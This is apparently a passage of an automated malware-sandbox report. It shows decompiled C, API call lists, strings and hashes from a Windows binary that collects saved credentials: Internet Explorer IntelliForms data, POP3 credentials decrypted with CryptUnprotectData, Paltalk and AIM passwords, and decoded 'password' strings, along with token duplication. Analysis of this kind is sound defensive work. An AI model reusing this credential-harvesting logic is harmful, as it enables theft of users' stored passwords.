						_t121 = E0040876F(_v16 | 0x00010000);
						 *( *(_t172 + 0x34) + _v12 + 0xc) = _t121;
						_t122 = 5;
					}
					_v8 = _v8 + 0x24;
					_t178 = _v8 - 0x41b98c;
				} while (_t178 < 0);
				 *(_t172 + 0x38) =  *(_t172 + 0x38) & 0x00000000;
				 *((intOrPtr*)(_t172 + 0x3c)) = _a8;
				_t161 = 4;
				_t110 = _t122 * _t161;
				 *(_t172 + 0x20) = _t122;
				 *((intOrPtr*)(_t172 + 0x1c)) = 0x20;
				0x413d5c( ~(0 | _t178 > 0x00000000) | _t110);
				 *(_t172 + 0x24) = _t110;
				0x413d5c(0xc);
				_t170 = _t110;
				if(_t170 == 0) {
					_t170 = 0;
					__eflags = 0;
				} else {
					_t114 =  *((intOrPtr*)(_t172 + 0x48));
					_t180 = _t114;
					_a8 = _t114;
					if(_t180 == 0) {
						_a8 = 0x64;
					}
					 *((intOrPtr*)(_t170 + 8)) = _a4;
					_t163 = 4;
					_t117 = _t122 * _t163;
					 *(_t170 + 4) = _t122;
					0x413d5c( ~(0 | _t180 > 0x00000000) | _t117);
					_a4 = _a4 & 0x00000000;
					 *_t170 = _t117;
					do {
						_t152 = _a4;
						_t119 = _t152 << 2;
						_a4 = _a4 + 1;
						 *( *_t170 + _t119 + 2) = _t152;
						 *((short*)(_t119 +  *_t170)) = _a8;
					} while (_a4 < _t122);
				}
				 *(_t172 + 0x19c) =  *(_t172 + 0x19c) & 0x00000000;
				 *(_t172 + 0x1a0) = _t170;
				 *((intOrPtr*)(_t172 + 0x40)) = 1;
				 *((intOrPtr*)(_t172 + 0x198)) = 1;
				 *((intOrPtr*)(_t172 + 0x1a4)) = 1;
				 *((intOrPtr*)(_t172 + 0x1a8)) = 1;
				 *((intOrPtr*)(_t172 + 0x1c4)) = 0x32;
				return E004094DA(_t172);
			}

































                                          0x0040955a
                                          0x00409563
                                          0x00409565
                                          0x0040956d
                                          0x00409573
                                          0x00409574
                                          0x0040957e
                                          0x00409581
                                          0x00409586
                                          0x00409591
                                          0x00409596
                                          0x004095a0
                                          0x004095a3
                                          0x004095ad
                                          0x004095b4
                                          0x004095b7
                                          0x004095be
                                          0x004095be
                                          0x004095c1
                                          0x004095c3
                                          0x004095c6
                                          0x004095d5
                                          0x004095e9
                                          0x004095ef
                                          0x004095f2
                                          0x004095fd
                                          0x00409607
                                          0x0040960f
                                          0x00409612
                                          0x00409616
                                          0x0040962f
                                          0x00409633
                                          0x00409640
                                          0x00409644
                                          0x00409644
                                          0x00409645
                                          0x00409649
                                          0x00409649
                                          0x00409659
                                          0x0040965d
                                          0x00409664
                                          0x00409667
                                          0x0040966c
                                          0x0040966f
                                          0x0040967b
                                          0x00409682
                                          0x00409685
                                          0x0040968a
                                          0x00409690
                                          0x004096ec
                                          0x004096ec
                                          0x00409692
                                          0x00409692
                                          0x00409695
                                          0x00409697
                                          0x0040969a
                                          0x0040969c
                                          0x0040969c
                                          0x004096a6
                                          0x004096ad
                                          0x004096b0
                                          0x004096b5
                                          0x004096bd
                                          0x004096c2
                                          0x004096c7
                                          0x004096c9
                                          0x004096c9
                                          0x004096d0
                                          0x004096d3
                                          0x004096d9
                                          0x004096e4
                                          0x004096e4
                                          0x004096ea
                                          0x004096ee
                                          0x004096f8
                                          0x00409700
                                          0x00409703
                                          0x00409709
                                          0x0040970f
                                          0x00409715
                                          0x00409728

                                          APIs
                                            • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040937C
                                            • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040938A
                                            • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040939B
                                            • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093B2
                                            • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093BB
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409591
                                          • ??2@YAPAXI@Z.MSVCRT ref: 004095AD
                                          • memcpy.MSVCRT ref: 004095D5
                                          • memcpy.MSVCRT ref: 004095F2
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040967B
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409685
                                          • ??2@YAPAXI@Z.MSVCRT ref: 004096BD
                                            • Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
                                            • Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877
                                            • Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
                                            • Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                          • String ID: $$d
                                          • API String ID: 2915808112-2066904009
                                          • Opcode ID: 83977fa4547c2105a15e70559c2e4334156e97c5c74def1868066ed2ae587b6c
                                          • Instruction ID: c86123869de2e32e5bed1250838fccac9115591d6117e5efa9fb73667f4d6fb1
                                          • Opcode Fuzzy Hash: 83977fa4547c2105a15e70559c2e4334156e97c5c74def1868066ed2ae587b6c
                                          • Instruction Fuzzy Hash: D8514971A01704AFDB24DF29D582BAAB7F4FF48314F10852EE55ADB292DB74E9408F44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004134D0, Relevance: 13.6, APIs: 9, Instructions: 61windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32(00000000), ref: 004134D2
                                          • GetWindowLongA.USER32(00000000,000000EC), ref: 004134E4
                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 004134EF
                                          • GetClassNameA.USER32(00000000,?,000003FF), ref: 00413505
                                          • GetWindowTextA.USER32(00000000,?,000003FF), ref: 00413511
                                          • GetWindowRect.USER32(00000000,?), ref: 0041351F
                                          • CopyRect.USER32(?,?), ref: 00413533
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00413541
                                          • SendMessageA.USER32(00000000,00000031,00000000,00000000), ref: 0041359A
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Window$LongRect$ClassCopyMessageNameParentPointsSendText
                                          • String ID:
                                          • API String ID: 2317770421-0
                                          • Opcode ID: 7af2e41bf762aae8540d43ee514e8ccf414c9672fa24b186be0172eacc68f4a9
                                          • Instruction ID: beb27d93b7d0259d1707648e93b0cb5b486bd7e44cd55be4178ee0c76b875b45
                                          • Opcode Fuzzy Hash: 7af2e41bf762aae8540d43ee514e8ccf414c9672fa24b186be0172eacc68f4a9
                                          • Instruction Fuzzy Hash: BF21A6B5500B01EFD7609F75DC88AD7BBEDFB88700F00CA2DA5AAD2254DA306541CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041244B, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                          • API String ID: 3510742995-3273207271
                                          • Opcode ID: 13415ff2963e6dace8cd86106c59db4403270bd4b6c64038e468014c2b1c2be9
                                          • Instruction ID: f5a03e54b86e24f841f817b97e8ec33e4e13f45a83786b80a5cfcbc9bb1d817d
                                          • Opcode Fuzzy Hash: 13415ff2963e6dace8cd86106c59db4403270bd4b6c64038e468014c2b1c2be9
                                          • Instruction Fuzzy Hash: 0401DFB2EC465475EB3201093E4AFE72A4447B7B21F660667F589A0285E0DD0EF381BF
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410205, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 132COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004102AA
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,73AFF420,00000000), ref: 004102C3
                                          • _strnicmp.MSVCRT ref: 004102DF
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00418AE0,000000FF,?,000000FF,00000000,00000000,?,?,?,?,73AFF420,00000000), ref: 0041030D
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,73AFF420,00000000), ref: 0041032C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharMultiWide$_strnicmpmemset
                                          • String ID: WindowsLive:name=*$windowslive:name=
                                          • API String ID: 2393399448-3589380929
                                          • Opcode ID: 71b69f7c8173fc3aa574efd14f73b3720c8d0a19d14fe5437baa1e670a90085b
                                          • Instruction ID: 25a7ce4e34514ebc1ab433be8417aa6076f8fd68c633d2ab3a6fecdf2bbac582
                                          • Opcode Fuzzy Hash: 71b69f7c8173fc3aa574efd14f73b3720c8d0a19d14fe5437baa1e670a90085b
                                          • Instruction Fuzzy Hash: 59414DB190021EAFDB149F94DD849EEB7BCBF08304F1441AAE915A3251D774EEC4CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040821A, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E0040821A(void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				intOrPtr _v32;
				void _v287;
				char _v288;
				void* __esi;
				void** _t43;
				intOrPtr _t80;
				void* _t84;
				void* _t85;
				void* _t86;

				_t80 = _a4;
				_v32 = _t80 + 0x24;
				E0040733E(_t80 + 0x24);
				_t43 =  &_v20;
				0x411d68(0x80000001, "Software\Microsoft\Internet Explorer\IntelliForms\Storage2", _t43);
				_t85 = _t84 + 0xc;
				if(_t43 == 0) {
					_v16 = 0;
					_v24 = _t80 + 0x64;
					E0040746B(_t80 + 0x64, 0x2000);
					_v28 = 0;
					_v12 = 0xff;
					_v8 = 0x2000;
					_v288 = 0;
					memset( &_v287, 0, 0xff);
					_t86 = _t85 + 0xc;
					if(RegEnumValueA(_v20, 0,  &_v288,  &_v12, 0,  &_v28, E004074AA(_v24),  &_v8) != 0) {
						L4:
						return RegCloseKey(_v20);
					}
					_a4 = _a4 + 0x44;
					do {
						0x413df2( &_v288);
						E00407364(_v32,  &_v288, 0xffffffff);
						E00407364(_a4, E004074AA(_v24), _v8);
						_v16 = _v16 + 1;
						_v28 = 0;
						_v12 = 0xff;
						_v8 = 0x2000;
						_v288 = 0;
						memset( &_v287, 0, 0xff);
						_t86 = _t86 + 0xc;
					} while (RegEnumValueA(_v20, _v16,  &_v288,  &_v12, 0,  &_v28, E004074AA(_v24),  &_v8) == 0);
					goto L4;
				}
				return _t43;
			}


















                                          0x00408225
                                          0x0040822b
                                          0x0040822e
                                          0x00408233
                                          0x00408241
                                          0x00408246
                                          0x0040824b
                                          0x0040825e
                                          0x00408261
                                          0x00408264
                                          0x00408277
                                          0x0040827a
                                          0x0040827d
                                          0x00408280
                                          0x00408286
                                          0x0040828b
                                          0x004082b7
                                          0x0040834c
                                          0x00000000
                                          0x00408355
                                          0x004082c3
                                          0x004082c6
                                          0x004082cd
                                          0x004082df
                                          0x004082f3
                                          0x004082f8
                                          0x00408304
                                          0x00408307
                                          0x0040830a
                                          0x0040830d
                                          0x00408313
                                          0x00408318
                                          0x00408344
                                          0x00000000
                                          0x004082c6
                                          0x00408359

                                          APIs
                                            • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407341
                                            • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407349
                                            • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                            • Part of subcall function 0040746B: ??3@YAXPAX@Z.MSVCRT ref: 00407478
                                          • memset.MSVCRT ref: 00408286
                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,?), ref: 004082AF
                                          • _strupr.MSVCRT ref: 004082CD
                                            • Part of subcall function 00407364: strlen.MSVCRT ref: 00407375
                                            • Part of subcall function 00407364: ??3@YAXPAX@Z.MSVCRT ref: 00407398
                                            • Part of subcall function 00407364: ??3@YAXPAX@Z.MSVCRT ref: 004073BB
                                            • Part of subcall function 00407364: memcpy.MSVCRT ref: 004073DB
                                          • memset.MSVCRT ref: 00408313
                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,?), ref: 0040833E
                                          • RegCloseKey.ADVAPI32(?), ref: 0040834F
                                          Strings
                                          • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00408237
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@$EnumValuememset$CloseOpen_struprmemcpystrlen
                                          • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                          • API String ID: 373939914-680441574
                                          • Opcode ID: 595d46858c789d7861cec1ba9a6a44fece00a80f0e7bf05d1a4c71afb02c0405
                                          • Instruction ID: e14454ebfdff30ad66f99699cc9b695ae8a68f87cdcb03d8fe41683d15f76d0b
                                          • Opcode Fuzzy Hash: 595d46858c789d7861cec1ba9a6a44fece00a80f0e7bf05d1a4c71afb02c0405
                                          • Instruction Fuzzy Hash: 5141EDB2D0011DAFDB11DF99DC829DEBBBCAF14304F10406ABA05F2151E634AB45CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407A93, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 93registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 65%
                                          			E00407A93(intOrPtr* _a4, void* _a8, intOrPtr _a12) {
				int _v12;
				int _v16;
				unsigned int _v20;
				int _v24;
				int _v28;
				char _v32;
				char* _v36;
				char _v40;
				char _v296;
				char _v552;
				char _v808;
				char _v1064;
				void _v2087;
				char _v2088;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t42;
				char* _t66;
				void* _t70;

				_v2088 = 0;
				memset( &_v2087, 0, 0x3ff);
				_v12 = 0x400;
				_v1064 = 0;
				_v808 = 0;
				_v552 = 0;
				_v296 = 0;
				_t42 = RegQueryValueExA(_a8, "POP3_credentials", 0,  &_v16,  &_v2088,  &_v12);
				_t74 = _t42;
				if(_t42 != 0) {
					return _t42;
				}
				_v32 = 0;
				_v24 = 0;
				_v28 = 0;
				if(E00404C9D( &_v32, _t74) != 0) {
					_v36 =  &_v2088;
					_v40 = _v12;
					if(E00404CF5( &_v32,  &_v40, 0,  &_v20) != 0) {
						 *((char*)(_t70 + WideCharToMultiByte(0, 0, _v16, _v20 >> 1,  &_v552, 0xfd, 0, 0) - 0x224)) = 0;
						LocalFree(_v16);
						0x411d82(_a8, "POP3_name");
						0x411d82(_a8, "POP3_host");
						_t66 =  &_v1064;
						E00406958(0xff, _t66, _a12);
						 *((intOrPtr*)( *_a4))(_t66);
					}
				}
				return E00404CE0( &_v32);
			}























                                          0x00407aae
                                          0x00407ab4
                                          0x00407ad4
                                          0x00407adb
                                          0x00407ae1
                                          0x00407ae7
                                          0x00407aed
                                          0x00407af3
                                          0x00407af9
                                          0x00407afb
                                          0x00407bc3
                                          0x00407bc3
                                          0x00407b04
                                          0x00407b07
                                          0x00407b0a
                                          0x00407b14
                                          0x00407b20
                                          0x00407b26
                                          0x00407b3c
                                          0x00407b60
                                          0x00407b67
                                          0x00407b82
                                          0x00407b97
                                          0x00407b9f
                                          0x00407ba5
                                          0x00407bb5
                                          0x00407bb5
                                          0x00407b3c
                                          0x00000000

                                          APIs
                                          • memset.MSVCRT ref: 00407AB4
                                          • RegQueryValueExA.ADVAPI32(?,POP3_credentials,00000000,?,?,?), ref: 00407AF3
                                            • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                            • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FD,00000000,00000000,?,00000000,?), ref: 00407B57
                                          • LocalFree.KERNEL32(?), ref: 00407B67
                                            • Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                            • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                            • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrlen
                                          • String ID: POP3_credentials$POP3_host$POP3_name
                                          • API String ID: 2752996003-2190619648
                                          • Opcode ID: f9e0cc1d15b7ae483417ba89dbd2acaad5c80dd12f00609131e53948eb699b81
                                          • Instruction ID: 3c80738b82331245788ee24e24f692cafec0a237d8f87c7d6b462bdafe46d179
                                          • Opcode Fuzzy Hash: f9e0cc1d15b7ae483417ba89dbd2acaad5c80dd12f00609131e53948eb699b81
                                          • Instruction Fuzzy Hash: 9F312DB190121DAFDB11DF99DD81AEEBBBCEF48304F4040AAE955B3251D634AF448BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410F07, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                          • memset.MSVCRT ref: 00410F48
                                            • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                          • memset.MSVCRT ref: 00410F92
                                          • RegCloseKey.ADVAPI32(?), ref: 00410FF6
                                          • RegCloseKey.ADVAPI32(?), ref: 0041101F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Closememset$EnumOpen
                                          • String ID: Software\Paltalk$nickname$pwd
                                          • API String ID: 1938129365-1014362899
                                          • Opcode ID: 371f017254c023b24f35e6f21b54137d424e2b90dbe38bf80ef2b31f4a61ba7b
                                          • Instruction ID: 96d414647358d9b2c810da9b3bce946d65dcecd18022e5434843d59e9988e6f9
                                          • Opcode Fuzzy Hash: 371f017254c023b24f35e6f21b54137d424e2b90dbe38bf80ef2b31f4a61ba7b
                                          • Instruction Fuzzy Hash: 7B3164B1D4011DAFDF11AB95DD42BEE7B7DAF18304F0000A6F604A2111D7399F95CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004044DE, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 59libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E004044DE(char _a4) {
				signed int _v8;
				void* _v12;
				void* _v16;
				int _t17;
				_Unknown_base(*)()* _t19;
				void* _t20;
				_Unknown_base(*)()* _t22;
				void* _t24;
				void* _t25;
				void* _t27;
				void* _t33;

				_v8 = _v8 & 0x00000000;
				_t17 =  &_v8;
				0x410daa(0xffffffff, 0xe,  &_v16);
				if(_t17 == 0) {
					L10:
					if(_v8 == 0) {
						return _t17;
					}
					return FreeLibrary(_v8);
				}
				_t25 = _v16;
				0x410d8a(_t33, _t24);
				if(_t17 == 0) {
					L9:
					_t17 = CloseHandle(_v16);
					goto L10;
				}
				_t19 = GetProcAddress(_v8, "DuplicateToken");
				if(_t19 != 0) {
					_t20 =  *_t19(_t25, 2,  &_v12);
					if(_t20 != 0) {
						_t27 = _v12;
						0x410d8a();
						if(_t20 != 0) {
							_t22 = GetProcAddress(_v8, "SetThreadToken");
							if(_t22 != 0) {
								 *_t22( &_a4, _t27);
							}
						}
						CloseHandle(_v12);
					}
				}
				goto L9;
			}














                                          0x004044e4
                                          0x004044f0
                                          0x004044f3
                                          0x004044fa
                                          0x00404565
                                          0x00404569
                                          0x00404575
                                          0x00404575
                                          0x00000000
                                          0x0040456e
                                          0x004044fd
                                          0x00404504
                                          0x0040450b
                                          0x0040455a
                                          0x0040455d
                                          0x00000000
                                          0x00404564
                                          0x0040451c
                                          0x00404520
                                          0x00404529
                                          0x0040452d
                                          0x0040452f
                                          0x00404532
                                          0x00404539
                                          0x00404543
                                          0x00404547
                                          0x0040454e
                                          0x0040454e
                                          0x00404547
                                          0x00404553
                                          0x00404553
                                          0x0040452d
                                          0x00000000

                                          APIs
                                            • Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00410DC0
                                          • FreeLibrary.KERNEL32(00000000,000000FF,0000000E,?,?,0040428D), ref: 0040456E
                                            • Part of subcall function 00410D8A: LoadLibraryA.KERNEL32(advapi32.dll,00410DB5,00000000,00000000,004044F8,000000FF,0000000E,?,?,0040428D), ref: 00410D94
                                          • GetProcAddress.KERNEL32(00000000,DuplicateToken), ref: 0040451C
                                          • GetProcAddress.KERNEL32(00000000,SetThreadToken), ref: 00404543
                                          • CloseHandle.KERNEL32(?), ref: 00404553
                                          • CloseHandle.KERNEL32(?,00000000,000000A0,000000FF,0000000E,?,?,0040428D), ref: 0040455D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$CloseHandleLibrary$FreeLoad
                                          • String ID: DuplicateToken$SetThreadToken
                                          • API String ID: 3357505703-785560009
                                          • Opcode ID: ead61f231025bced0a09c2f1fb3dd8adab68ce1b78bee45ece79c7bb5241faa8
                                          • Instruction ID: fb771c117c903999f7ab115302b4b85a9bfa7a6589c8aae05a31450a7ce75296
                                          • Opcode Fuzzy Hash: ead61f231025bced0a09c2f1fb3dd8adab68ce1b78bee45ece79c7bb5241faa8
                                          • Instruction Fuzzy Hash: D4113071900109FBDB10E7A5DD55EEE7B78AF84340F144176A611B10E1EB74DF44DA68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408FBC, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E00408FBC(void* __eflags, intOrPtr _a4) {
				void* _t3;
				int _t4;
				void* _t10;
				void* _t13;

				_t3 = E004069D3(_a4);
				if(_t3 != 0) {
					0x413d0c(0x41e200, _a4, _t10, _t13);
					0x413d0c(0x41e308, "general");
					_t4 = GetPrivateProfileIntA(0x41e308, "rtl", 0, 0x41e200);
					asm("sbb eax, eax");
					 *0x41e34c =  ~(_t4 - 1) + 1;
					 *0x41e350 = 0;
					return GetPrivateProfileStringA(0x41e308, "charset", 0x417c88, 0x41e350, 0x3f, 0x41e200);
				}
				return _t3;
			}







                                          0x00408fc0
                                          0x00408fc8
                                          0x00408fd6
                                          0x00408fe6
                                          0x00408ff7
                                          0x0040900d
                                          0x00409016
                                          0x0040901b
                                          0x00000000
                                          0x00409029
                                          0x0040902a

                                          APIs
                                            • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                          • _mbscpy.MSVCRT ref: 00408FD6
                                          • _mbscpy.MSVCRT ref: 00408FE6
                                          • GetPrivateProfileIntA.KERNEL32(0041E308,rtl,00000000,0041E200), ref: 00408FF7
                                          • GetPrivateProfileStringA.KERNEL32(0041E308,charset,00417C88,0041E350,0000003F,0041E200), ref: 00409022
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfile_mbscpy$AttributesFileString
                                          • String ID: charset$general$rtl
                                          • API String ID: 888011440-3784062100
                                          • Opcode ID: 55f41d98300eda273b6a0d0ace1f1b61fb276ed63f1592d27e33da27b08274f9
                                          • Instruction ID: ef4fb33988e1ec7767552a7ed3f3ae2affcfc9826048e3bb16e6b0e4c8ee98e3
                                          • Opcode Fuzzy Hash: 55f41d98300eda273b6a0d0ace1f1b61fb276ed63f1592d27e33da27b08274f9
                                          • Instruction Fuzzy Hash: 2CF0B43568020879E3111712AC0AFFB6E68EB86F11F18843FBC14921D1D67D494185AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405865, Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 202stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E00405865(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				char* _v12;
				intOrPtr* _v16;
				int _v20;
				char _v22;
				char _v23;
				signed int _v24;
				int _v28;
				int _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void _v172;
				char _v300;
				char _v1319;
				char _v1320;
				char _v1321;
				char _v1322;
				void _v1323;
				char _v1324;
				void _v1547;
				void _v1580;
				void* __ebx;
				void* __edi;
				void* _t90;
				void* _t98;
				int _t106;
				signed int _t112;
				signed int _t118;
				void* _t119;
				intOrPtr* _t128;
				void* _t129;
				void* _t130;
				void* _t132;
				signed int _t136;
				int _t147;
				signed int* _t152;
				void* _t153;
				void* _t154;
				void* _t155;

				_t130 = __ecx;
				_v36 = 0;
				_v1324 = 0;
				memset( &_v1323, 0, 0x3ff);
				_v44 = 0xffff;
				_v40 = 0xffff;
				_v300 = 0;
				_v172 = 0;
				_v20 = 0;
				_v32 = 0;
				_v28 = 0;
				_t90 = E00407193(_a8, _t130,  &_v1324, 0x3ff,  &_v36);
				_t155 = _t154 + 0x18;
				while(_t90 != 0) {
					if(_v20 == _v44 + 2) {
						_push( &_v1323);
						_t129 = 0x7f;
						_v32 = 1;
						E00406958(_t129,  &_v300);
					}
					if(_v20 == _v40 + 2) {
						_v28 = 1;
						_t106 = strlen( &_v1324);
						if(_v1323 == 0x27) {
							_t24 = _t106 - 3; // -3
							if(_t24 <= 0x7c &&  *((char*)(_t153 + _t106 - 0x529)) == 0x27) {
								_t136 = 8;
								memcpy( &_v1580, 0x418128, _t136 << 2);
								asm("movsb");
								_t147 = 0;
								memset( &_v1547, 0, 0xdf);
								memset( &_v172, 0, 0x80);
								_t112 = _v1322;
								_t155 = _t155 + 0x24;
								if(_t112 != 0x27) {
									_v16 =  &_v1322;
									_v8 =  &_v1319;
									_t128 =  &_v1320;
									_v12 =  &_v1321;
									while(_t112 != 0) {
										if(_t112 != 0x5c) {
											_v12 = _v12 + 1;
											_v8 = _v8 + 1;
											_t152 = _t153 + _t147 - 0xa8;
											_t128 = _t128 + 1;
											_v16 = _v16 + 1;
											 *_t152 = _t112;
										} else {
											_t118 =  *_t128;
											if( *_v12 != 0x78) {
												if(_t118 == 0x66) {
													_t118 = _t118 + 0xa6;
												}
												if(_t118 == 0x72) {
													_t118 = _t118 + 0x9b;
												}
												if(_t118 == 0x30) {
													_t118 = 0;
												}
												if(_t118 == 0x6e) {
													_t118 = _t118 + 0x9c;
												}
												if(_t118 == 0x74) {
													_t118 = _t118 + 0x95;
												}
												if(_t118 == 0x76) {
													_t118 = _t118 + 0x95;
												}
												if(_t118 == 0x61) {
													_t118 = _t118 + 0xa6;
												}
												if(_t118 == 0x62) {
													_t118 = _t118 + 0xa6;
												}
												_t152 = _t153 + _t147 - 0xa8;
												_push(2);
											} else {
												_v24 = _t118;
												_v23 =  *_v8;
												_v22 = 0;
												_t152 = _t153 + _t147 - 0xa8;
												_t118 = E00406D5A( &_v24);
												_push(4);
											}
											 *_t152 = _t118;
											_pop(_t119);
											_v12 = _v12 + _t119;
											_v8 = _v8 + _t119;
											_t128 = _t128 + _t119;
											_v16 = _v16 + _t119;
										}
										 *_t152 =  *(_t153 + _t147 - 0x628) ^  *_t152 ^ 0x00000031;
										_t112 =  *_v16;
										_t147 = _t147 + 1;
										if(_t112 != 0x27) {
											continue;
										}
										goto L33;
									}
								}
							}
						}
					}
					L33:
					if(_v32 != 0 && _v28 != 0) {
						 *((intOrPtr*)( *_a4))( &_v300);
						_v32 = 0;
						_v28 = 0;
						_v172 = 0;
						_v300 = 0;
					}
					if(E004070E4( &_v1324, ?str?) >= 0) {
						_v44 = _v20;
					}
					_t98 = E004070E4( &_v1324, "S'password'");
					_pop(_t132);
					if(_t98 >= 0) {
						_v40 = _v20;
					}
					_v20 = _v20 + 1;
					_t90 = E00407193(_a8, _t132,  &_v1324, 0x3ff,  &_v36);
					_t155 = _t155 + 0xc;
				}
				return _t90;
			}











































                                          0x00405865
                                          0x00405881
                                          0x00405884
                                          0x0040588a
                                          0x00405894
                                          0x00405897
                                          0x004058a4
                                          0x004058aa
                                          0x004058b1
                                          0x004058b4
                                          0x004058b7
                                          0x004058be
                                          0x004058c3
                                          0x00405ad9
                                          0x004058d4
                                          0x004058dc
                                          0x004058df
                                          0x004058e6
                                          0x004058ed
                                          0x004058f2
                                          0x004058fc
                                          0x00405909
                                          0x00405910
                                          0x0040591d
                                          0x00405923
                                          0x00405929
